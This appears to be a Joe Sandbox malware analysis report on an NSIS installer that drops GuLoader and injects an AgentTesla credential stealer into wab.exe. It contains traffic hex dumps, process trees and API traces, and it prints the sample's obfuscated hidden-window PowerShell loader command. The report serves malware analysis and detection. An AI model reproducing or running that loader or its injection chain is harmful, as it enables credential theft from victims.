2024-04-05 12:29:32 UTC	8000	IN	Data Raw: 4b 01 37 0b bf 62 63 ec 8f a8 e2 71 5e 96 8b 2c ea 80 b8 d5 9f be 60 75 0a ab 7e 48 3d 92 9c 04 d6 36 1e ca 5b ed 46 38 8f 81 f1 f9 7e 6b 3d 16 c5 b5 3a d8 42 75 5d 3f 9b c9 33 17 fe 00 2d 81 76 10 56 27 ab 86 79 5b 15 9b bd 48 8c e7 56 2c 61 7c 6b b5 aa 6f 6c c2 d3 29 17 7b be a9 3f 26 1c d6 15 ef dd c1 56 51 97 82 06 c4 f4 3b a2 a5 f8 2c b3 71 62 79 7f fc b0 2f 85 75 ac f3 f0 c4 dc 4d 3f d8 7b 38 e3 34 ae 56 03 34 33 3e d0 90 c3 8e 9f e3 93 2e 62 e0 9e e7 e4 30 af 02 3c 6f 45 1d 69 40 10 eb 2d 4b a5 24 86 c4 87 9f c8 7e 6a 3a 46 81 93 dd cd 29 a1 9b 89 02 0d 22 0e 03 7c d2 78 21 c3 d6 98 87 cf c8 d9 2f 8e 0b fc eb c6 f3 ef 98 5d af cc b9 ea 8f ff 6f 71 69 79 47 ca fe ea 98 3b 05 f2 70 81 36 0f 7c c4 4c be 5e f6 9c 35 39 9e 9f d7 31 5f a2 ae aa a6 6e e2 Data Ascii: K7bcq^,`u~H=6[F8~k=:Bu]?3-vV'y[HV,a\|kol){?&VQ;,qby/uM?{84V43>.b0<oEi@-K$~j:F)"\|x!/]oqiyG;p6\|L^591_n
2024-04-05 12:29:32 UTC	8000	IN	Data Raw: fb a8 d7 e8 b7 9c f6 b5 18 59 25 45 92 13 d5 d9 f2 a7 6a ad 97 75 e4 07 f1 70 0c fc ea 5f 90 13 0e ad 18 e7 66 20 41 f1 41 1e 6e a4 4a 1e 04 6c 94 57 ad c9 f7 df ff 6c 67 4e d4 ac 1b 4d 79 83 25 fd f9 c7 66 36 09 4d 8f 26 23 5a 2d 20 e5 06 f9 3d e6 9d 39 f6 bd af 98 af 55 6d 26 b3 60 42 8b 08 5a 28 47 1c 79 80 a1 70 70 3c 97 fd 65 cd bb 5e bb bd 1c a2 48 6b a0 cb fe 9c 85 33 8b c2 1f 60 f6 ee 8a 90 10 f6 aa db 76 e8 df 97 cb f3 7a 58 3d bb d4 f4 ca a7 3c 07 ed 78 12 81 05 dd 72 fd 5b c8 0d 25 c3 12 d6 e5 82 bd 88 de 42 1d db 12 51 4b 8e 06 68 1b e7 2f c3 f1 b7 78 7c cd 91 89 c1 8e ba ba 73 18 56 60 ad 63 41 74 60 6f d5 ac fe 8f fd a2 0e b5 45 4b 29 c2 33 7f c5 89 2d 24 52 ef 90 68 6b c5 f9 1a a5 6f 13 f9 cb 75 72 4e 9f 2d 34 1c ee e2 a1 9c e5 c0 91 73 16 Data Ascii: Y%Ejup_f AAnJlWlgNMy%f6M&#Z- =9Um&`BZ(Gypp<e^Hk3`vzX=<xr[%BQKh/x\|sV`cAt`oEK)3-$RhkourN-4s
2024-04-05 12:29:32 UTC	8000	IN	Data Raw: ef d7 ce 71 5a f4 b1 bc bd 56 e7 6c 28 02 1b ad 92 57 19 ba 20 e6 09 09 6d f7 0e fd e1 23 3e 52 4c 24 76 d3 13 d5 e4 76 e9 85 2a f0 7c b1 9f 31 79 97 0d d6 95 03 5b a5 40 c1 49 33 ff 2a 83 6d 34 42 6b 6b da 08 b7 d6 41 b0 e0 24 1e ef 75 27 68 e1 18 7a 4c 5e d0 c2 72 5f 3d 7b b9 13 c6 cc 98 86 0f 36 a4 d4 3b a9 f2 6f 4c 78 17 cd f8 01 67 24 e0 be d9 8b 7d 30 42 62 3c c1 0e ea e6 f3 4c 83 80 76 91 1e a9 28 1f 68 1b bc 80 9c 2a 7d c8 2d 40 ea e8 3e df 14 95 ee 75 87 c5 2a 65 59 47 81 8a e9 96 e2 98 85 64 c0 ee 71 02 83 d1 3e 2d c7 81 92 1a 96 be 56 c8 cc c8 6d 46 f1 57 a2 df 24 0d df 9a 0e 20 70 15 e2 df bb e9 1d a4 23 99 59 31 13 3a e9 4d ea 33 4b 01 18 6f d1 9f a1 4d b1 4e e9 d6 b4 9e d2 b3 ce 8a d9 86 d4 90 b6 13 f9 98 7a 5e 90 d2 b1 fe 9f 78 e6 48 9e 77 Data Ascii: qZVl(W m#>RL$vv\|1y[@I3m4BkkA$u'hzL^r_={6;oLxg$}0Bb<Lv(h}-@>ueYGdq>-VmFW$ p#Y1:M3KoMNz^xHw
2024-04-05 12:29:32 UTC	8000	IN	Data Raw: 5a 69 e9 ff d5 d5 6d 94 12 0e 3b 5a b5 51 82 e5 f3 92 60 f5 5d 31 f5 4d 8d 7e a6 fa 8b 09 55 b3 70 57 15 64 5b 1b 1c cc 0c 9e 04 6c 6f 23 94 93 d8 3d 4d 85 3a 0b 3c 90 f7 85 f6 ab 16 ef ad f1 55 94 5f b7 f6 ea 76 76 aa a1 67 d0 a8 1b 3e 78 a6 f4 8f aa bd 0f 72 66 7b 1d 04 0c a2 2e e7 97 1f ad 17 36 a8 9b 38 d3 9d eb 7e f1 4a ea d7 d2 09 82 4f 47 83 e1 07 99 0a 1b 17 26 8b 7c 38 6c d3 42 36 49 d3 4e d8 0f 54 78 a4 32 ef b6 1f cd 65 43 58 fc 94 87 63 ea 54 61 22 66 1a a4 73 b5 2d 17 82 6e 96 7f 8c f0 34 aa 4a 2b eb 83 62 74 09 b1 a5 46 7b a7 f0 d4 96 34 d8 ef 9c ce 0c 7d 5b 85 b6 7a 6f bf c6 b0 41 38 6c df 93 ff 2c d2 08 0d 78 22 32 63 8f 32 ab 49 ea c1 85 0c 36 65 bc f3 35 86 74 b2 ed e0 e7 73 17 b5 0b 7e b4 73 93 10 3f 7c 2c ce b5 c5 5c dc 2b 95 af e0 e8 Data Ascii: Zim;ZQ`]1M~UpWd[lo#=M:<U_vvg>xrf{.68~JOG&\|8lB6INTx2eCXcTa"fs-n4J+btF{4}[zoA8l,x"2c2I6e5ts~s?\|,\+
2024-04-05 12:29:32 UTC	8000	IN	Data Raw: 2a c5 c3 17 e8 04 2f 54 a1 9d 14 7b ce f7 80 6f 65 fd 86 d3 64 28 89 9e 5f fa e9 3c 50 01 dd a3 06 3b e1 1c 15 64 a9 c0 79 cc e9 a9 66 c6 24 9d 49 68 a3 49 ae 34 e7 08 60 a7 6c 03 1c fc df e0 98 40 66 1a a3 b7 c9 ce 8c fd cc 4b 01 31 f5 4d 65 5a a2 11 a8 e2 85 8a 90 8b 57 8c a6 65 d1 e1 d6 60 8b 0c 8b 13 68 3c 98 a5 3b 8e c8 10 e2 59 13 4a 30 71 71 fd fe 7e 1b 58 29 7c 6b c5 27 bc 79 a3 3e 88 c3 33 17 ff 10 0d 80 76 10 3f d8 7d c7 7b 5d ea 97 bd 49 b7 d4 52 2c 28 83 6a 8c 94 6f 6c d3 cb 2c 17 7b be 6f 5e df e3 11 be e4 ed c3 56 d4 9b 84 06 e5 f5 3b b3 85 06 2d 8a 6d 9c 77 7f d4 8f 1f 85 7f de bd 12 c8 ac 22 2e d8 7b 32 1d c4 af 6f 29 36 33 3e d0 4e cc 88 9f e3 93 2c 64 e0 be 1b e8 30 af dc 3c 56 57 1d 97 41 5a 0c 2d 4b af e2 8d c5 87 bf f3 b4 95 c5 47 71 Data Ascii: */T{oed(_<P;dyf$IhI4`l@fK1MeZWe`h<;YJ0qq~X)\|k'y>3v?}{]IR,(jol,{o^V;-mw".{2o)63>N,d0<VWAZ-KGq
2024-04-05 12:29:32 UTC	8000	IN	Data Raw: 4e 54 3c f8 7a 5d 1c 0f 5d d5 4c be 5c 08 d6 39 15 ee 61 d1 3d 5f 82 ad a9 96 6d 1c 92 ee 23 04 9d fc a4 87 3c 89 4e c0 63 0c 51 95 86 bd 70 3c 5a 75 54 58 ce 7c fd 7a 23 d5 7a e1 f5 2e c6 86 4b aa 1a 14 75 10 37 06 25 a7 19 fa a8 f7 ed b5 9c f6 4b c1 60 20 45 58 13 ed dc 50 a6 6a 95 ca 8a 1b f8 db 70 0c ef da 5d 90 d1 a5 ad 18 e6 52 21 50 d1 9e 1f 6e a4 b2 10 04 6c ad f9 ad c8 f7 df 01 60 25 4e f4 ad de 4c 79 7d 23 c6 e5 c7 60 36 f7 44 8e 26 58 27 36 10 e4 26 76 3e e6 9d 13 77 bd be b2 8f 57 6d 26 4d 90 41 8b 30 94 d6 4b 1c 79 5e ae 7d 70 1c 6b fc 5c da 45 5f 82 62 15 a2 48 39 a8 cf fe ec 85 57 8b c2 13 32 9e f1 8a e0 c6 e4 aa db 7c e8 dd 96 cb f3 7b 58 3d bb d4 fb fe b0 3c f9 e1 8b 1b a1 04 a6 0e fd a5 cd 5b 42 c3 12 dc b6 0c bd 88 d4 42 1d db 12 71 b7 Data Ascii: NT<z]]L\9a=_m#<NcQp<ZuTX\|z#z.Ku7%K` EXPjp]R!Pnl`%NLy}#`6D&X'6&v>wWm&MA0Ky^}pk\E_bH9W2\|{X=<[BBq
2024-04-05 12:29:32 UTC	8000	IN	Data Raw: d7 dd 96 bc 78 d3 1a af 4c 0e fa cb d7 48 05 9f 2c 34 e2 f3 c1 a1 62 e9 c8 6f 83 1a 63 f2 54 63 c0 79 17 fc 28 f3 01 9c 71 00 1c c7 c3 89 a7 41 37 e8 89 6f a9 36 3d 25 e8 2b f6 56 16 3d 58 c7 09 52 8e 62 23 cb f2 ec cc 2c 7f ee ee e4 ec a4 f8 56 b0 d2 06 19 65 22 3a 1a ac 92 57 e7 9e a6 e6 f7 03 0f 78 61 39 eb 03 30 26 79 24 88 dc 60 de ce 88 95 fa 39 d1 7d bb f0 4e 87 96 3e ab eb 02 5b d0 33 cd 43 39 ff 2d 83 6d 3c bf 6b 6b dc 99 c1 d6 41 b6 e0 24 1f ef ab 29 62 e1 77 1a 4d 67 fa 1f 74 5f c3 77 9f ce 38 c5 98 86 f2 27 a4 d4 3b 7f 70 67 4c 47 71 42 f8 01 93 08 eb be b6 a3 83 3e 49 be c2 33 16 eb c6 d2 4c 83 80 2e 91 11 84 22 e1 64 0f bc 5e 91 39 7d 46 ba 71 39 14 c1 de e6 98 fc 55 a3 c4 2a 65 a7 1e 46 81 fb 96 1c ac 92 64 3e e2 58 47 f2 47 fe b6 37 7e 6d Data Ascii: xLH,4bocTcy(qA7o6=%+V=XRb#,Ve":Wxa90&y$`9}N>[3C9-m<kkA$)bwMgt_w8';pgLGqB>I3L."d^9}Fq9U*eFd>XGG7~m
2024-04-05 12:29:32 UTC	8000	IN	Data Raw: d2 d7 b4 94 c0 24 31 75 2c 29 2c 9f b6 63 2f 89 7d 5e 64 ec 19 fe 9f 69 b0 9f 9e 77 c5 bd 69 bd c0 1e 92 1f ab a5 6c 7f fa e0 32 28 11 6e 74 f9 48 48 59 76 83 f3 ae 95 2b 78 09 fe 3d 33 f7 82 f2 31 0d c2 54 09 22 25 4a b4 be 89 7a e9 01 d9 28 60 fd 73 f0 2d 40 c7 9d 8c 8a ab fd 39 ff 81 c5 c0 73 8d 54 a6 04 c6 3f 55 4d 7e 54 15 44 6f 1a 1c cc 83 d7 04 6c 59 df 9a 9b c8 c3 41 8d 3a 2b 3c 90 f5 85 d6 96 e9 ef ad 6c d1 99 57 b7 e0 20 76 76 b0 81 66 d0 a8 1b a4 17 c7 c5 8a ac 69 61 72 66 2c e3 08 1e 82 41 86 97 1f 59 6b d3 bd a3 9c bd c4 eb 7e 05 7f b8 d7 f2 0c 7c 43 44 7d c0 3f 97 0a 1b 9a 56 91 7c 39 92 fd 4d 36 b7 df b9 d6 2a 54 78 5a 3e ca 8b 3f ca 65 de a6 0e 9c be b6 22 54 61 08 46 1b a4 73 4b b9 ea 8c 52 fd 81 80 f4 ca 8e 4f 29 15 89 9f 7a f2 bd 5b 4a Data Ascii: $1u,),c/}^diwil2(ntHHYv+x=31T"%Jz(`s-@9sT?UM~TDolYA:+<lW vvfiarf,AYk~\|CD}?V\|9M6*TxZ>?e"TaFsKRO)z[J

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.26.12.205	443	7456	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 12:29:34 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-05 12:29:35 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 12:29:35 GMT Content-Type: text/plain Content-Length: 15 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 86f98b6718ef748d-MIA
2024-04-05 12:29:35 UTC	15	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 Data Ascii: 102.129.152.231

Target ID:	0
Start time:	14:28:53
Start date:	05/04/2024
Path:	C:\Users\user\Desktop\hnTW5HdWvY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hnTW5HdWvY.exe"
Imagebase:	0x400000
File size:	541'940 bytes
MD5 hash:	D32A9F003D7D44F7839D1E73AB0880DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:28:56
Start date:	05/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"
Imagebase:	0x870000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2018427169.0000000008E2F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:28:56
Start date:	05/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:28:57
Start date:	05/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:29:20
Start date:	05/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0xf30000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	27.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.2%
Total number of Nodes:	1357
Total number of Limit Nodes:	51

Executed Functions

Function 100010D3 Relevance: 130.1, APIs: 66, Strings: 8, Instructions: 571
stringfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001096: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,0000001F,?,100010FF), ref: 100010A5
Part of subcall function 10001096: GetProcAddress.KERNEL32(00000000), ref: 100010AC
Part of subcall function 10001096: GetCurrentProcess.KERNEL32(?,?,0000001F,?,100010FF), ref: 100010BC

GetModuleFileNameA.KERNEL32(?,00000104), ref: 10001119
GlobalAlloc.KERNEL32(00000040,?), ref: 1000112F
CharPrevA.USER32(?,?), ref: 10001157
GlobalFree.KERNEL32(00000000), ref: 1000117E
GetTempFileNameA.KERNEL32(?,10003068,00000000,00000001), ref: 1000119B
CopyFileA.KERNEL32(?,00000001,00000000), ref: 100011AD
CreateFileA.KERNEL32(00000001,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 100011C3
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 100011D2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 100011E0
UnmapViewOfFile.KERNEL32(00000000), ref: 1000120A
CloseHandle.KERNEL32(00000000), ref: 10001217
CloseHandle.KERNEL32(00000000), ref: 1000121A
lstrcatA.KERNEL32(?,10003064), ref: 10001224
lstrlenA.KERNEL32(?), ref: 1000122D
GlobalAlloc.KERNEL32(00000040,00000401), ref: 1000124C
FindWindowExA.USER32(00010458,00000000,#32770,00000000), ref: 10001284
FindWindowExA.USER32(00000000), ref: 10001287
lstrcmpiA.KERNEL32(00000000,/OEM), ref: 100012BA
DeleteFileA.KERNEL32(?,error), ref: 100012F0
GlobalAlloc.KERNEL32(00000042,00000400), ref: 1000138D
GlobalLock.KERNEL32(00000000), ref: 1000139F
GetVersionExA.KERNEL32(00000094), ref: 100013AF
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 100013C4
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 100013D2
CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 100013FD
CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 10001410
GetStartupInfoA.KERNEL32(00000044), ref: 1000141D
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 10001457
lstrcpyA.KERNEL32(?,error), ref: 1000146D
GetTickCount.KERNEL32 ref: 10001478
PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000), ref: 1000149F
GetTickCount.KERNEL32 ref: 100014AE
ReadFile.KERNEL32(?,10003078,000003FF,00000001,00000000), ref: 100014C5
lstrlenA.KERNEL32(?), ref: 100014E6
lstrlenA.KERNEL32(?,10003078,00000400), ref: 100014FB
lstrcpynA.KERNEL32(?), ref: 10001501
lstrlenA.KERNEL32(10003078), ref: 10001510
GlobalSize.KERNEL32(?), ref: 1000151C
GlobalUnlock.KERNEL32(?), ref: 10001529
GlobalReAlloc.KERNEL32(?,-000002FD,00000042), ref: 1000153B
GlobalLock.KERNEL32(00000000), ref: 1000154D
lstrcatA.KERNEL32(?,10003078), ref: 1000155A
GlobalSize.KERNEL32(?), ref: 1000156D
CharNextA.USER32(?), ref: 10001600
GetTickCount.KERNEL32 ref: 1000162B
TerminateProcess.KERNEL32(?,000000FF), ref: 1000163F
lstrcpyA.KERNEL32(?,timeout), ref: 10001651
Sleep.KERNELBASE(00000064), ref: 1000165B
WaitForSingleObject.KERNEL32(?,00000000), ref: 10001665
GetExitCodeProcess.KERNELBASE(?,?), ref: 10001675
PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000), ref: 10001686

Part of subcall function 100017FC: lstrlenA.KERNEL32(?,?,00000000,00000000,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 1000180C
Part of subcall function 100017FC: lstrlenA.KERNEL32(?,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 1000183E

lstrcpyA.KERNEL32(?,error), ref: 100016A0
lstrcpyA.KERNEL32(?,error), ref: 100016E4
wsprintfA.USER32 ref: 10001701
CloseHandle.KERNEL32(?,?), ref: 1000171F
CloseHandle.KERNEL32(?), ref: 10001724
CloseHandle.KERNEL32(?), ref: 10001729
CloseHandle.KERNEL32(?), ref: 1000172E
CloseHandle.KERNEL32(?), ref: 10001733
CloseHandle.KERNEL32(?), ref: 10001738
DeleteFileA.KERNEL32(?), ref: 1000174D
GlobalFree.KERNEL32(00000001), ref: 1000175C
GlobalUnlock.KERNEL32(?), ref: 10001766
GlobalFree.KERNEL32(?), ref: 1000176F

Strings

, xrefs: 100015A1
#32770, xrefs: 1000127D
/OEM, xrefs: 100012B4
/TIMEOUT=, xrefs: 10001294
SysListView32, xrefs: 10001276
D, xrefs: 10001309
error, xrefs: 10001173, 100012D3, 10001467, 1000169A, 100016DE
timeout, xrefs: 1000164B

Memory Dump Source

Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd

Similarity

API ID: Global$File$Handle$Close$lstrlen$Create$AllocPipeProcesslstrcpy$CountFreeTick$CharDeleteDescriptorFindLockModuleNameNamedPeekSecuritySizeUnlockViewWindowlstrcat$AddressCodeCopyCurrentDaclExitInfoInitializeMappingNextObjectPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcmpilstrcpynwsprintf
String ID: $#32770$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
API String ID: 3603830316-610251817
Opcode ID: 016e07df3c6318c65741b72991dda62d90931a2e4b8fd357ffb1f2aeac278298
Instruction ID: 5d3aa95b024551451db062b49e7ededdcde9422ea28527eb2b4ccaa03aed4984
Opcode Fuzzy Hash: 016e07df3c6318c65741b72991dda62d90931a2e4b8fd357ffb1f2aeac278298
Instruction Fuzzy Hash: 76224A71800259EFFB12DFA4CC88AEEBBB9EF08384F154069E645A7169DB315E45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 004030CB Relevance: 79.1, APIs: 27, Strings: 18, Instructions: 324
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004030EC
SetErrorMode.KERNELBASE(00008001), ref: 004030F7
OleInitialize.OLE32(00000000), ref: 004030FE

Part of subcall function 00405EA5: GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
Part of subcall function 00405EA5: LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
Part of subcall function 00405EA5: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3

SHGetFileInfoA.SHELL32(0079D4B8,00000000,?,00000160,00000000,00000008), ref: 00403126

Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Profiling Setup,NSIS Error), ref: 00405B87

GetCommandLineA.KERNEL32(Profiling Setup,NSIS Error), ref: 0040313B
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",00000000), ref: 0040314E
CharNextA.USER32(00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",00000020), ref: 00403179
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403276
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403287
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403293
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032A7
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032AF
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032C0
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032C8
DeleteFileA.KERNELBASE(1033), ref: 004032DC
OleUninitialize.OLE32(?), ref: 0040338A
ExitProcess.KERNEL32 ref: 004033AA
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\hnTW5HdWvY.exe",00000000,?), ref: 004033B6
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033C2
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033CE
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033D5
DeleteFileA.KERNEL32(0079D0B8,0079D0B8,?,"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)",?), ref: 0040342E
CopyFileA.KERNEL32(C:\Users\user\Desktop\hnTW5HdWvY.exe,0079D0B8,00000001), ref: 00403442
CloseHandle.KERNEL32(00000000,0079D0B8,0079D0B8,?,0079D0B8,00000000), ref: 0040346F
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034C4
ExitWindowsEx.USER32(00000002,00000000), ref: 00403500
ExitProcess.KERNEL32 ref: 00403523

Strings

", xrefs: 0040319E
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs, xrefs: 00403367
"C:\Users\user\Desktop\hnTW5HdWvY.exe", xrefs: 00403141, 00403147, 00403300
Error launching installer, xrefs: 00403342
TEMP, xrefs: 004032BB
C:\Users\user\Desktop\hnTW5HdWvY.exe, xrefs: 0040343D
Profiling Setup, xrefs: 00403131
1033, xrefs: 004032D7
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited, xrefs: 0040325B, 0040335C, 004033DB, 004033E4
\Temp, xrefs: 0040328D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040326B, 00403270, 00403286, 00403292, 004032A1, 004032AE, 004032BA, 004032C2, 004033B5, 004033C1, 004033CD, 004033D4, 00403483
"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", xrefs: 004033F2
TMP, xrefs: 004032C3
NSIS Error, xrefs: 0040312C
C:\Users\user\Desktop, xrefs: 004033BB, 004033C0, 004033E3
~nsu.tmp, xrefs: 004033B0
SeShutdownPrivilege, xrefs: 004034D6
Low, xrefs: 004032A9

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
